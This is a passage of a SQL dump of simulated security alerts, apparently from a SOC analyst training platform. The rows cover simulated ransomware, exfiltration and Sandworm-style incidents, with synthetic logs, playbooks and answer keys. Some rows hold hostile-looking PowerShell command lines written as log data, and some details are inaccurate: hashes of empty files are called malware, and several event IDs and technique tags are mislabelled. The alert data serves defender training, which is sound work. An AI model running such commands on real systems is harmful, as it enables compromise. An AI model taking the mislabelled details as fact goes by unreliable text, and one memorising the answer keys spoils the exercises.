to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 
100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(520, 'Suspicious Network Traffic Detected', 'medium', 'Network Intrusion Detection System (NIDS)', 'Unusual traffic patterns have been detected originating from a popular news site, indicating a potential drive-by download attempt aimed at gaining initial access.', 'Drive-by Download', 'T1189', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"http_request\":{\"method\":\"GET\",\"url\":\"http://news.example.com/malicious.js\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://news.example.com/home\"},\"malware_hash\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"filename\":\"malicious.js\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host possibly compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"IP associated with previous drive-by download activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://news.example.com/malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosts a known malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"JavaScript file with obfuscated 
code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(521, 'Unverified Flash Update Executed', 'high', 'Endpoint Detection and Response (EDR)', 'A fake Adobe Flash update was executed on the endpoint, leading to the installation of a ransomware payload. The operation is part of a broader campaign aiming to deploy ransomware via social engineering tactics.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-5G9H1F2\",\"user\":\"john_doe\",\"process_name\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\fake_flash_update.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"src_ip\":\"102.54.98.112\",\"internal_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\\",\"event_type\":\"Execution\",\"description\":\"A suspicious application resembling Adobe Flash Player was executed, which is known to deploy ransomware payloads.\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"fake_flash_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known ransomware delivery mechanism disguised as Adobe Flash update.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"102.54.98.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known C2 servers.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the affected 
machine.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(522, 'DiskCryptor Ransomware Detected', 'high', 'File Integrity Monitoring', 'DiskCryptor has been activated on the victim\'s machine, initiating encryption of the hard drive and establishing ransomware persistence.', 'Persistence', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:36Z\",\"event_id\":\"FIM-2023-5698\",\"file_path\":\"C:\\\\Program Files\\\\DiskCryptor\\\\dcinst.exe\",\"file_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"user\":\"compromised_user\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"event_type\":\"file_change\",\"description\":\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\",\"additional_info\":{\"protocol\":\"HTTPS\",\"connection_status\":\"Active\"}}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as DiskCryptor ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"dcinst.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename used by DiskCryptor ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. 
File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. 
File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(523, 'Unauthorized SMB Traffic Observed', 'high', 'Network Traffic Analysis', 'An unauthorized SMB traffic pattern was detected indicating possible lateral movement within the network. The activity was flagged due to the use of known ransomware tactics to spread laterally across the network, utilizing the SMB protocol.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T13:45:00Z\",\"event_id\":\"SMB-ALERT-004\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.25\",\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"detected_filename\":\"ransomware_payload.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john_doe\",\"action\":\"File Transfer\",\"status\":\"Suspicious\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host receiving unauthorized SMB traffic.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to ransomware distribution.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware 
payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"malicious\",\"details\":\"File named associated with ransomware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(524, 'Encrypted Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) System', 'Anomalous outbound traffic detected from an internal host to a known malicious IP. The traffic pattern suggests an attempt to exfiltrate encrypted files, which could potentially be used for ransom. The files in question were detected on host 192.168.1.23 and attempted to connect to external IP 203.0.113.45.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_source\":\"DLP System\",\"internal_ip\":\"192.168.1.23\",\"external_ip\":\"203.0.113.45\",\"detected_files\":[{\"filename\":\"confidential_data.enc\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}],\"username\":\"jsmith\",\"action\":\"attempted_exfiltration\",\"network_protocol\":\"HTTPS\",\"file_size\":\"15MB\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to encrypted file detected during exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.enc\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Filename indicative of sensitive encrypted 
data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"employee_directory\",\"verdict\":\"clean\",\"details\":\"Username of the individual using the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(525, 'Initial Breach Detected: Unauthorized Network Access', 'high', 'Network Traffic Analysis', 'The attackers exploited a vulnerability in the event\'s ticketing system to enter the network. This marks the first step in their infiltration, indicating a sophisticated approach to gaining a foothold within the target\'s network.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'closed', 1, '{\"timestamp\":\"2023-10-15T14:56:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"request_url\":\"https://event.ticketing.com/login\",\"exploit_used\":\"CVE-2023-XXXX\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"exploit_payload.bin\",\"username\":\"compromised_user\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by initial access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Sandworm.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in exploitation attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity 
Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login activity detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(526, 'Malicious Script Execution: Ceremony Systems Compromised', 'high', 'Endpoint Detection and Response (EDR)', 'A carefully crafted script was executed on key systems involved in the ceremony, initiating a sequence of disruptions. The script is linked to known Sandworm TTPs, aiming to deploy destructive malware within the ceremony\'s IT infrastructure.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:23Z\",\"hostname\":\"ceremony-server-01\",\"username\":\"admin_ceremony\",\"process\":\"/usr/bin/powershell\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\Public\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"internal_ip\":\"10.10.5.23\",\"external_ip\":\"185.143.223.101\",\"filename\":\"malicious_script.ps1\",\"process_id\":4721,\"malware_family\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', 